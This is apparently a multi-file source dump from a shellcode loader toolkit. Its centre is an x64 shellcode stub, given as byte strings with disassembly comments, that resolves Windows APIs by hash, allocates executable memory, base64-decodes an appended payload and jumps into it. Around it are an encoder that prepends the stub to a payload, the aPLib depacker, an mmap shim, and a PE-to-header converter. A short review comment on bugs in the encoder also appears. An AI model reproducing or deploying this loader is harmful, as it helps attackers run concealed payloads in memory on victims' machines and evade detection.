868 HRESULT ( STDMETHODCALLTYPE *RequestVirtualMemLimit )(
869 IGCHostControl * This,
870 /* [in] */ SIZE_T sztMaxVirtualMemMB,
871 /* [out][in] */ SIZE_T *psztNewMaxVirtualMemMB);
872
873 END_INTERFACE
874 } IGCHostControlVtbl;
875
876 typedef struct _IGCHostControl
877 {
878 IGCHostControlVtbl *lpVtbl;
879 } IGCHostControl;
880
881 typedef struct IDebuggerThreadControlVtbl
882 {
883 BEGIN_INTERFACE
884
885 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
886 IDebuggerThreadControl * This,
887 /* [in] */ REFIID riid,
888 /* [iid_is][out] */
889 __RPC__deref_out void **ppvObject);
890
891 ULONG ( STDMETHODCALLTYPE *AddRef )(
892 IDebuggerThreadControl * This);
893
894 ULONG ( STDMETHODCALLTYPE *Release )(
895 IDebuggerThreadControl * This);
896
897 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForDebugger)(
898 IDebuggerThreadControl * This);
899
900 HRESULT ( STDMETHODCALLTYPE *ReleaseAllRuntimeThreads)(
901 IDebuggerThreadControl * This);
902
903 HRESULT ( STDMETHODCALLTYPE *StartBlockingForDebugger)(
904 IDebuggerThreadControl * This,
905 DWORD dwUnused);
906
907 END_INTERFACE
908 } IDebuggerThreadControlVtbl;
909
910 typedef struct _IDebuggerThreadControl {
911 IDebuggerThreadControlVtbl *lpVtbl;
912 } IDebuggerThreadControl;
913
914 #endif
915
0 /*
1 * aPLib compression library - the smaller the better :)
2 *
3 * C depacker
4 *
5 * Copyright (c) 1998-2014 Joergen Ibsen
6 * All Rights Reserved
7 *
8 * http://www.ibsensoftware.com/
9 */
10
11 #include "depack.h"
12
13 /* internal data structure */
14 struct APDSTATE {
15 const unsigned char *source;
16 unsigned char *destination;
17 unsigned int tag;
18 unsigned int bitcount;
19 };
20
21 static unsigned int aP_getbit(struct APDSTATE *ud)
22 {
23 unsigned int bit;
24
25 /* check if tag is empty */
26 if (!ud->bitcount--) {
27 /* load next tag */
28 ud->tag = *ud->source++;
29 ud->bitcount = 7;
30 }
31
32 /* shift bit out of tag */
33 bit = (ud->tag >> 7) & 0x01;
34 ud->tag <<= 1;
35
36 return bit;
37 }
38
39 static unsigned int aP_getgamma(struct APDSTATE *ud)
40 {
41 unsigned int result = 1;
42
43 /* input gamma2-encoded bits */
44 do {
45 result = (result << 1) + aP_getbit(ud);
46 } while (aP_getbit(ud));
47
48 return result;
49 }
50
51 unsigned int aP_depack(const void *source, void *destination)
52 {
53 struct APDSTATE ud;
54 unsigned int offs, len, R0, LWM;
55 int done;
56 int i;
57
58 ud.source = (const unsigned char *) source;
59 ud.destination = (unsigned char *) destination;
60 ud.bitcount = 0;
61
62 R0 = (unsigned int) -1;
63 LWM = 0;
64 done = 0;
65
66 /* first byte verbatim */
67 *ud.destination++ = *ud.source++;
68
69 /* main decompression loop */
70 while (!done) {
71 if (aP_getbit(&ud)) {
72 if (aP_getbit(&ud)) {
73 if (aP_getbit(&ud)) {
74 offs = 0;
75
76 for (i = 4; i; i--) {
77 offs = (offs << 1) + aP_getbit(&ud);
78 }
79
80 if (offs) {
81 *ud.destination = *(ud.destination - offs);
82 ud.destination++;
83 }
84 else {
85 *ud.destination++ = 0x00;
86 }
87
88 LWM = 0;
89 }
90 else {
91 offs = *ud.source++;
92
93 len = 2 + (offs & 0x0001);
94
95 offs >>= 1;
96
97 if (offs) {
98 for (; len; len--) {
99 *ud.destination = *(ud.destination - offs);
100 ud.destination++;
101 }
102 }
103 else {
104 done = 1;
105 }
106
107 R0 = offs;
108 LWM = 1;
109 }
110 }
111 else {
112 offs = aP_getgamma(&ud);
113
114 if ((LWM == 0) && (offs == 2)) {
115 offs = R0;
116
117 len = aP_getgamma(&ud);
118
119 for (; len; len--) {
120 *ud.destination = *(ud.destination - offs);
121 ud.destination++;
122 }
123 }
124 else {
125 if (LWM == 0) {
126 offs -= 3;
127 }
128 else {
129 offs -= 2;
130 }
131
132 offs <<= 8;
133 offs += *ud.source++;
134
135 len = aP_getgamma(&ud);
136
137 if (offs >= 32000) {
138 len++;
139 }
140 if (offs >= 1280) {
141 len++;
142 }
143 if (offs < 128) {
144 len += 2;
145 }
146
147 for (; len; len--) {
148 *ud.destination = *(ud.destination - offs);
149 ud.destination++;
150 }
151
152 R0 = offs;
153 }
154
155 LWM = 1;
156 }
157 }
158 else {
159 *ud.destination++ = *ud.source++;
160 LWM = 0;
161 }
162 }
163
164 return (unsigned int) (ud.destination - (unsigned char *) destination);
165 }
0
1 compile: cl encode.c mmap-windows.c
2 usage: encode loader.bin base64.txt
0
1 // Target architecture : X86 64
2
3 #define DECODE_SIZE 353
4
5 char DECODE[] = {
6 /* 0000 */ "\x56" /* push rsi */
7 /* 0001 */ "\x53" /* push rbx */
8 /* 0002 */ "\x57" /* push rdi */
9 /* 0003 */ "\x55" /* push rbp */
10 /* 0004 */ "\xeb\x0a" /* jmp 0x10 */
11 /* 0006 */ "\x5d" /* pop rbp */
12 /* 0007 */ "\x31\xc0" /* xor eax, eax */
13 /* 0009 */ "\xb0\x9b" /* mov al, 0x9b */
14 /* 000B */ "\x48\x01\xe8" /* add rax, rbp */
15 /* 000E */ "\xff\xe0" /* jmp rax */
16 /* 0010 */ "\xe8\xf1\xff\xff\xff" /* call 6 */
17 /* 0015 */ "\x56" /* push rsi */
18 /* 0016 */ "\x53" /* push rbx */
19 /* 0017 */ "\x57" /* push rdi */
20 /* 0018 */ "\x55" /* push rbp */
21 /* 0019 */ "\x41\x89\xc0" /* mov r8d, eax */
22 /* 001C */ "\xeb\x72" /* jmp 0x90 */
23 /* 001E */ "\x41\x59" /* pop r9 */
24 /* 0020 */ "\x6a\x60" /* push 0x60 */
25 /* 0022 */ "\x41\x5b" /* pop r11 */
26 /* 0024 */ "\x65\x49\x8b\x03" /* mov rax, qword ptr gs:[r11] */
27 /* 0028 */ "\x48\x8b\x40\x18" /* mov rax, qword ptr [rax + 0x18] */
28 /* 002C */ "\x48\x8b\x78\x10" /* mov rdi, qword ptr [rax + 0x10] */
29 /* 0030 */ "\xeb\x03" /* jmp 0x35 */
30 /* 0032 */ "\x48\x8b\x3f" /* mov rdi, qword ptr [rdi] */
31 /* 0035 */ "\x48\x8b\x5f\x30" /* mov rbx, qword ptr [rdi + 0x30] */
32 /* 0039 */ "\x48\x85\xdb" /* test rbx, rbx */
33 /* 003C */ "\x74\x4b" /* je 0x89 */
34 /* 003E */ "\x8b\x73\x3c" /* mov esi, dword ptr [rbx + 0x3c] */
35 /* 0041 */ "\x44\x01\xde" /* add esi, r11d */
36 /* 0044 */ "\x8b\x4c\x33\x28" /* mov ecx, dword ptr [rbx + rsi + 0x28] */
37 /* 0048 */ "\x67\xe3\xe7" /* jecxz 0x32 */
38 /* 004B */ "\x48\x8d\x74\x0b\x0c" /* lea rsi, qword ptr [rbx + rcx + 0xc] */
39 /* 0050 */ "\xad" /* lodsd eax, dword ptr [rsi] */
40 /* 0051 */ "\x41\xff\xd1" /* call r9 */
41 /* 0054 */ "\x50" /* push rax */
42 /* 0055 */ "\x41\x5a" /* pop r10 */
43 /* 0057 */ "\xad" /* lodsd eax, dword ptr [rsi] */
44 /* 0058 */ "\xad" /* lodsd eax, dword ptr [rsi] */
45 /* 0059 */ "\xad" /* lodsd eax, dword ptr [rsi] */
46 /* 005A */ "\x91" /* xchg eax, ecx */
47 /* 005B */ "\x67\xe3\xd4" /* jecxz 0x32 */
48 /* 005E */ "\xad" /* lodsd eax, dword ptr [rsi] */
49 /* 005F */ "\x92" /* xchg eax, edx */
50 /* 0060 */ "\x48\x01\xda" /* add rdx, rbx */
51 /* 0063 */ "\xad" /* lodsd eax, dword ptr [rsi] */
52 /* 0064 */ "\x95" /* xchg eax, ebp */
53 /* 0065 */ "\x48\x01\xdd" /* add rbp, rbx */
54 /* 0068 */ "\xad" /* lodsd eax, dword ptr [rsi] */
55 /* 0069 */ "\x96" /* xchg eax, esi */
56 /* 006A */ "\x48\x01\xde" /* add rsi, rbx */
57 /* 006D */ "\x48\x8b\x44\x8d\xfc" /* mov rax, qword ptr [rbp + rcx*4 - 4] */
58 /* 0072 */ "\x41\xff\xd1" /* call r9 */
59 /* 0075 */ "\x44\x01\xd0" /* add eax, r10d */
60 /* 0078 */ "\x44\x39\xc0" /* cmp eax, r8d */
61 /* 007B */ "\xe0\xf0" /* loopne 0x6d */
62 /* 007D */ "\x75\xb3" /* jne 0x32 */
63 /* 007F */ "\x0f\xb7\x04\x4e" /* movzx eax, word ptr [rsi + rcx*2] */
64 /* 0083 */ "\x8b\x04\x82" /* mov eax, dword ptr [rdx + rax*4] */
65 /* 0086 */ "\x48\x01\xc3" /* add rbx, rax */
66 /* 0089 */ "\x48\x93" /* xchg rax, rbx */
67 /* 008B */ "\x5d" /* pop rbp */
68 /* 008C */ "\x5f" /* pop rdi */
69 /* 008D */ "\x5b" /* pop rbx */
70 /* 008E */ "\x5e" /* pop rsi */
71 /* 008F */ "\xc3" /* ret */
72 /* 0090 */ "\xe8\x89\xff\xff\xff" /* call 0x1e */
73 /* 0095 */ "\x52" /* push rdx */
74 /* 0096 */ "\x56" /* push rsi */
75 /* 0097 */ "\x96" /* xchg eax, esi */
76 /* 0098 */ "\x48\x01\xde" /* add rsi, rbx */
77 /* 009B */ "\x31\xc0" /* xor eax, eax */
78 /* 009D */ "\x99" /* cdq */
79 /* 009E */ "\xac" /* lodsb al, byte ptr [rsi] */
80 /* 009F */ "\x08\xc0" /* or al, al */
81 /* 00A1 */ "\x74\x09" /* je 0xac */
82 /* 00A3 */ "\x0c\x20" /* or al, 0x20 */
83 /* 00A5 */ "\x01\xc2" /* add edx, eax */
84 /* 00A7 */ "\xc1\xca\x08" /* ror edx, 8 */
85 /* 00AA */ "\xeb\xf2" /* jmp 0x9e */
86 /* 00AC */ "\x92" /* xchg eax, edx */
87 /* 00AD */ "\x5e" /* pop rsi */
88 /* 00AE */ "\x5a" /* pop rdx */
89 /* 00AF */ "\xc3" /* ret */
90 /* 00B0 */ "\x48\x99" /* cqo */
91 /* 00B2 */ "\xb2\xb1" /* mov dl, 0xb1 */
92 /* 00B4 */ "\x48\x01\xd0" /* add rax, rdx */
93 /* 00B7 */ "\x48\x83\xec\x78" /* sub rsp, 0x78 */
94 /* 00BB */ "\x54" /* push rsp */
95 /* 00BC */ "\x5b" /* pop rbx */
96 /* 00BD */ "\x48\x8d\x7b\x48" /* lea rdi, qword ptr [rbx + 0x48] */
97 /* 00C1 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
98 /* 00C3 */ "\xb8\x39\x81\x4f\x45" /* mov eax, 0x454f8139 */
99 /* 00C8 */ "\xff\xd5" /* call rbp */
100 /* 00CA */ "\x48\xab" /* stosq qword ptr [rdi], rax */
101 /* 00CC */ "\xb8\xd7\x0e\xf5\xe0" /* mov eax, 0xe0f50ed7 */
102 /* 00D1 */ "\xff\xd5" /* call rbp */
103 /* 00D3 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
104 /* 00D5 */ "\xb8\x57\x6d\x60\x46" /* mov eax, 0x46606d57 */
105 /* 00DA */ "\xff\xd5" /* call rbp */
106 /* 00DC */ "\x48\xab" /* stosq qword ptr [rdi], rax */
107 /* 00DE */ "\xb8\xb1\x64\x4a\x3f" /* mov eax, 0x3f4a64b1 */
108 /* 00E3 */ "\xff\xd5" /* call rbp */
109 /* 00E5 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
110 /* 00E7 */ "\x31\xc0" /* xor eax, eax */
111 /* 00E9 */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
112 /* 00ED */ "\xff\x53\x58" /* call qword ptr [rbx + 0x58] */
113 /* 00F0 */ "\x89\x43\x44" /* mov dword ptr [rbx + 0x44], eax */
114 /* 00F3 */ "\x31\xd2" /* xor edx, edx */
115 /* 00F5 */ "\x48\x89\x53\x30" /* mov qword ptr [rbx + 0x30], rdx */
116 /* 00F9 */ "\x48\x89\x53\x28" /* mov qword ptr [rbx + 0x28], rdx */
117 /* 00FD */ "\x48\x89\x53\x38" /* mov qword ptr [rbx + 0x38], rdx */
118 /* 0101 */ "\x48\x8d\x4b\x38" /* lea rcx, qword ptr [rbx + 0x38] */
119 /* 0105 */ "\x48\x89\x4b\x20" /* mov qword ptr [rbx + 0x20], rcx */
120 /* 0109 */ "\x4d\x31\xc9" /* xor r9, r9 */
121 /* 010C */ "\x6a\x07" /* push 7 */
122 /* 010E */ "\x41\x58" /* pop r8 */
123 /* 0110 */ "\x92" /* xchg eax, edx */
124 /* 0111 */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
125 /* 0115 */ "\xff\x53\x68" /* call qword ptr [rbx + 0x68] */
126 /* 0118 */ "\x6a\x40" /* push 0x40 */
127 /* 011A */ "\x41\x59" /* pop r9 */
128 /* 011C */ "\x6a\x30" /* push 0x30 */
129 /* 011E */ "\x41\x58" /* pop r8 */
130 /* 0120 */ "\x49\xc1\xe0\x08" /* shl r8, 8 */
131 /* 0124 */ "\x8b\x53\x38" /* mov edx, dword ptr [rbx + 0x38] */
132 /* 0127 */ "\x31\xc9" /* xor ecx, ecx */
133 /* 0129 */ "\xff\x53\x60" /* call qword ptr [rbx + 0x60] */
134 /* 012C */ "\x48\x89\x43\x3c" /* mov qword ptr [rbx + 0x3c], rax */
135 /* 0130 */ "\x31\xd2" /* xor edx, edx */
136 /* 0132 */ "\x48\x89\x53\x30" /* mov qword ptr [rbx + 0x30], rdx */
137 /* 0136 */ "\x48\x89\x53\x28" /* mov qword ptr [rbx + 0x28], rdx */
138 /* 013A */ "\x48\x8d\x4b\x38" /* lea rcx, qword ptr [rbx + 0x38] */
139 /* 013E */ "\x48\x89\x4b\x20" /* mov qword ptr [rbx + 0x20], rcx */
140 /* 0142 */ "\x50" /* push rax */
141 /* 0143 */ "\x41\x59" /* pop r9 */
142 /* 0145 */ "\x6a\x07" /* push 7 */
143 /* 0147 */ "\x41\x58" /* pop r8 */
144 /* 0149 */ "\x8b\x53\x44" /* mov edx, dword ptr [rbx + 0x44] */
145 /* 014C */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
146 /* 0150 */ "\xff\x53\x68" /* call qword ptr [rbx + 0x68] */
147 /* 0153 */ "\x48\x8b\x43\x3c" /* mov rax, qword ptr [rbx + 0x3c] */
148 /* 0157 */ "\x48\x83\xc4\x78" /* add rsp, 0x78 */
149 /* 015B */ "\x5d" /* pop rbp */
150 /* 015C */ "\x5f" /* pop rdi */
151 /* 015D */ "\x5b" /* pop rbx */
152 /* 015E */ "\x5e" /* pop rsi */
153 /* 015F */ "\xff\xe0" /* jmp rax */
154 };
0
1
2 // test unit for decode.asm
3 // odzhan
4
5 #include <stdint.h>
6 #include <stdio.h>
7 #include <stdlib.h>
8 #include <string.h>
9 #include <sys/stat.h>
10 #include <inttypes.h>
11 #include <fcntl.h>
12
13 #if defined(_WIN32) || defined(_WIN64)
14 #define WINDOWS
15 #include <windows.h>
16 #include "mmap.h"
17 #if defined(_MSC_VER)
18 #pragma comment(lib, "advapi32.lib")
19 #pragma comment(lib, "user32.lib")
20 #pragma comment(lib, "crypt32.lib")
21 #endif
22 #else
23 #define LINUX
24 #include <unistd.h>
25 #include <sys/types.h>
26 #include <sys/mman.h>
27 #endif
28
29 #include "decode.h"
30
31 uint32_t hash_string(const char *str) {
32 char c;
33 uint32_t h = 0;
34
35 do {
36 c = *str++;
37 if(c == 0) break;
38 h += (c | 0x20);
39 h = (h << 32-8) | (h >> 8);
40 } while(c != 0);
41
42 return h;
43 }
44
45 void bin2hex(void *bin, int len) {
46 int i;
47 uint8_t *p=(uint8_t*)bin;
48
49 for(i=0; i<8; i++) printf(" %02x", p[i]);
50 }
51
52 int main(int argc, char *argv[]) {
53 struct stat fs;
54 int in;
55 FILE *out;
56 char *infile, *outfile;
57 DWORD inlen, outlen;
58 PVOID outbuf, inbuf;
59
60 if(argc != 3) {
61 printf("\nusage: encode <infile> <outfile>\n");
62 return 0;
63 }
64
65 infile = argv[1];
66 outfile = argv[2];
67
68 if(stat(infile, &fs) != 0) {
69 printf("unable to access %s\n", infile);
70 return -1;
71 }
72
73 in = open(infile, O_RDONLY);
74 if(in < 0) {
75 printf("unable to open %s.\n", infile);
76 return -1;
77 }
78
79 out = fopen(outfile, "wb");
80 if(out < 0) {
81 printf("unable to open %s for writing.\n", outfile);
82 close(in);
83 return -1;
84 }
85
86 inlen = fs.st_size;
87 inbuf = mmap(NULL, inlen, PROT_READ, MAP_PRIVATE, in, 0);
88
89 if(inbuf != NULL) {
90 outlen = 0;
91 if(CryptBinaryToString(inbuf, inlen,
92 CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &outlen))
93 {
94 outbuf = calloc(1, outlen + DECODE_SIZE + 8);
95 if(outbuf != NULL) {
96 if(CryptBinaryToString(inbuf, inlen,
97 CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, outbuf, &outlen))
98 {
99 fwrite(DECODE, 1, DECODE_SIZE, out);
100 fwrite(outbuf, 1, outlen, out);
101 } else {
102 printf("CryptBinaryToString failed.\n");
103 }
104 free(outbuf);
105 } else {
106 printf("unable to allocate memory.\n");
107 }
108 } else {
109 printf("unable to obtain length\n");
110 }
111 munmap(inbuf, inlen);
112 } else {
113 printf("unable to map\n");
114 }
115 fclose(out);
116 close(in);
117 return 0;
118 }
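Review bot: Both error checks in `main` test the wrong sentinel, so the failure paths fall through into the happy path. `fopen` returns a pointer and never compares below zero, so `if(out < 0)` should be `if(out == NULL)`; as written a failed open reaches `fwrite` and `fclose` on a null `FILE *`. Likewise `mmap` (POSIX, and the bundled Windows replacement whose header defines `MAP_FAILED` as `((void *) -1)`) signals failure with `MAP_FAILED` rather than `NULL`, so `if(inbuf != NULL)` passes a failed mapping to `CryptBinaryToString` and `munmap`; use `if(inbuf != MAP_FAILED)` instead. Minor: `bin2hex` ignores its `len` argument and always prints eight bytes, though nothing in this file calls it.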
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 ret = MAP_FAILED;
61 }
62 CloseHandle(h);
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 }
70
71 #undef DWORD_HI
72 #undef DWORD_LO
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <stdio.h>
32 #include <string.h>
33 #include <stdlib.h>
34 #include <stdint.h>
35 #include <ctype.h>
36
37 #include <fcntl.h>
38 #include <errno.h>
39 #include <sys/types.h>
40 #include <sys/stat.h>
41
42 #if defined(_WIN32) || defined(_WIN64)
43 #define WINDOWS
44 #include <windows.h>
45 #include <shlwapi.h>
46 #include "mmap.h"
47 #pragma comment(lib, "shlwapi.lib")
48 #else
49 #define NIX
50 #include <libgen.h>
51 #include <sys/mman.h>
52 #include <unistd.h>
53 #include <pe.h>
54 #endif
55
56 // return pointer to DOS header
57 PIMAGE_DOS_HEADER DosHdr(void *map) {
58 return (PIMAGE_DOS_HEADER)map;
59 }
60
61 // return pointer to NT header
62 PIMAGE_NT_HEADERS NtHdr (void *map) {
63 return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew);
64 }
65
66 // return pointer to File header
67 PIMAGE_FILE_HEADER FileHdr (void *map) {
68 return &NtHdr(map)->FileHeader;
69 }
70
71 // determines CPU architecture of binary
72 int is32 (void *map) {
73 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386;
74 }
75
76 // determines CPU architecture of binary
77 int is64 (void *map) {
78 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_AMD64;
79 }
80
81 // return pointer to Optional header
82 void* OptHdr (void *map) {
83 return (void*)&NtHdr(map)->OptionalHeader;
84 }
85
86 // return pointer to first section header
87 PIMAGE_SECTION_HEADER SecHdr (void *map) {
88 PIMAGE_NT_HEADERS nt = NtHdr(map);
89
90 return (PIMAGE_SECTION_HEADER)((uint8_t*)&nt->OptionalHeader +
91 nt->FileHeader.SizeOfOptionalHeader);
92 }
93
94 uint32_t DirSize (void *map) {
95 if (is32(map)) {
96 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->NumberOfRvaAndSizes;
97 } else {
98 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->NumberOfRvaAndSizes;
99 }
100 }
101
102 uint32_t SecSize (void *map) {
103 return NtHdr(map)->FileHeader.NumberOfSections;
104 }
105
106 PIMAGE_DATA_DIRECTORY Dirs (void *map) {
107 if (is32(map)) {
108 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory;
109 } else {
110 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory;
111 }
112 }
113
114 uint64_t ImgBase (void *map) {
115 if (is32(map)) {
116 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->ImageBase;
117 } else {
118 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->ImageBase;
119 }
120 }
121
122 // valid dos header?
123 int valid_dos_hdr (void *map) {
124 PIMAGE_DOS_HEADER dos = DosHdr(map);
125
126 if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
127 return (dos->e_lfanew != 0);
128 }
129
130 // valid nt headers
131 int valid_nt_hdr (void *map) {
132 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
133 }
134
135 uint32_t rva2ofs (void *map, uint32_t rva) {
136 int i;
137
138 PIMAGE_SECTION_HEADER sh = SecHdr(map);
139
140 for (i=0; i<SecSize(map); i++) {
141 if (rva >= sh[i].VirtualAddress && rva < sh[i].VirtualAddress + sh[i].SizeOfRawData)
142 return sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
143 }
144 return -1;
145 }
146
147 void bin2h(void *map, char *fname, void *bin, uint32_t len) {
148 char label[32], file[32], *str;
149 uint32_t i;
150 uint8_t *p=(uint8_t*)bin;
151 FILE *fd;
152
153 memset(label, 0, sizeof(label));
154 memset(file, 0, sizeof(file));
155
156 #if defined(WINDOWS)
157 str = PathFindFileName(fname);
158 #else
159 str = basename(fname);
160 #endif
161 for(i=0; str[i] != 0 && i < 16;i++) {
162 if(str[i] == '.') {
163 file[i] = label[i] = '_';
164 } else {
165 label[i] = toupper(str[i]);
166 file[i] = tolower(str[i]);
167 }
168 }
169 if(map != NULL) {
170 strcat(label, is32(map) ? "_X86" : "_X64");
171 strcat(file, is32(map) ? "_x86" : "_x64");
172 }
173 strcat(file, ".h");
174
175 fd = fopen(file, "wb");
176
177 if(fd != NULL) {
178 fprintf(fd, "\nunsigned char %s[] = {", label);
179
180 for(i=0;i<len;i++) {
181 if(!(i % 12)) fprintf(fd, "\n ");
182 fprintf(fd, "0x%02x", p[i]);
183 if((i+1) != len) fprintf(fd, ", ");
184 }
185 fprintf(fd, "};\n\n");
186 fclose(fd);
187 printf(" [ saved code to %s\n", file);
188 } else printf(" [ unable to create file : %s\n", file);
189 }
190
191 void bin2go(void* map, char* fname, void* bin, uint32_t len) {
192 char label[32], file[32], * str;
193 uint32_t i;
194 uint8_t* p = (uint8_t*)bin;
195 FILE* fd;
196
197 memset(label, 0, sizeof(label));
198 memset(file, 0, sizeof(file));
199
200 #if defined(WINDOWS)
201 str = PathFindFileName(fname);
202 #else
203 str = basename(fname);
204 #endif
205 for (i = 0; str[i] != 0 && i < 16; i++) {
206 if (str[i] == '.') {
207 file[i] = label[i] = '_';
208 }
209 else {
210 label[i] = toupper(str[i]);
211 file[i] = tolower(str[i]);
212 }
213 }
214 if (map != NULL) {
215 strcat(label, is32(map) ? "_X86" : "_X64");
216 strcat(file, is32(map) ? "_x86" : "_x64");
217 }
218 strcat(file, ".go");
219
220 fd = fopen(file, "wb");
221
222 if (fd != NULL) {
223 fprintf(fd, "package donut\n\n// %s - stub for EXE PE files\nvar %s = []byte{\n", label, label);
224
225 for (i = 0; i < len; i++) {
226 if (!(i % 12)) fprintf(fd, "\n ");
227 fprintf(fd, "0x%02x", p[i]);
228 if ((i + 1) != len) fprintf(fd, ", ");
229 }
230 fprintf(fd, "};\n\n");
231 fclose(fd);
232 printf(" [ saved code to %s\n", file);
233 }
234 else printf(" [ unable to create file : %s\n", file);
235 }
236
237
238 /**
239 void bin2array(void *map, char *fname, void *bin, uint32_t len) {
240 char label[32], file[32], *str;
241 uint32_t i;
242 uint32_t *p=(uint32_t*)bin;
243 FILE *fd;
244
245 memset(label, 0, sizeof(label));
246 memset(file, 0, sizeof(file));
247
248 #if defined(WINDOWS)
249 str = PathFindFileName(fname);
250 #else
251 str = basename(fname);
252 #endif
253 for(i=0; str[i] != 0 && i < 16;i++) {
254 if(str[i] == '.') {
255 file[i] = label[i] = '_';
256 } else {
257 label[i] = toupper(str[i]);
258 file[i] = tolower(str[i]);
259 }
260 }
261
262 strcat(file, ".h");
263
264 fd = fopen(file, "wb");
265
266 if(fd != NULL) {
267 // align up by 4
268 len = (len & -4) + 4;
